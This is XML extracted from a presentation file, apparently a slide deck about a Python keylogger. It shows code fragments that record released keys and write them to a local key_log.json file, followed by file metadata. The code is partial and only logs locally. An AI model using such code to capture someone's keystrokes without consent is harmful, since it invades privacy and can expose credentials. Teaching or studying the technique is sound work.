            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>global flag, keys_used, keys</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>keys_used.append(</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>{'Released': f'{key}'}</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>if flag == True:</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 Define the generate_json_file function</a:t>
            </a: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def generate_json_file(keys_used):</a:t>
            </a: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    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>with open('key_log.json', '+wb') as key_log:</a:t>
            </a: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        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>key_log.write(key_list_bytes)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-IN" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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3.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4.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5.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6.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7.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8.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9.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26</TotalTime>
  <Application>LibreOffice/24.2.2.2$Windows_X86_64 LibreOffice_project/d56cc158d8a96260b836f100ef4b4ef25d6f1a01</Application>
  <AppVersion>15.0000</AppVersion>
  <Words>1020</Words>
  <Paragraphs>107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2024-04-04T20:22:28Z</dcterms:modified>
  <cp:revision>27</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PresentationFormat">
    <vt:lpwstr>Widescreen</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Slides">
    <vt:i4>16</vt:i4>
  </property>
</Properties>
</file>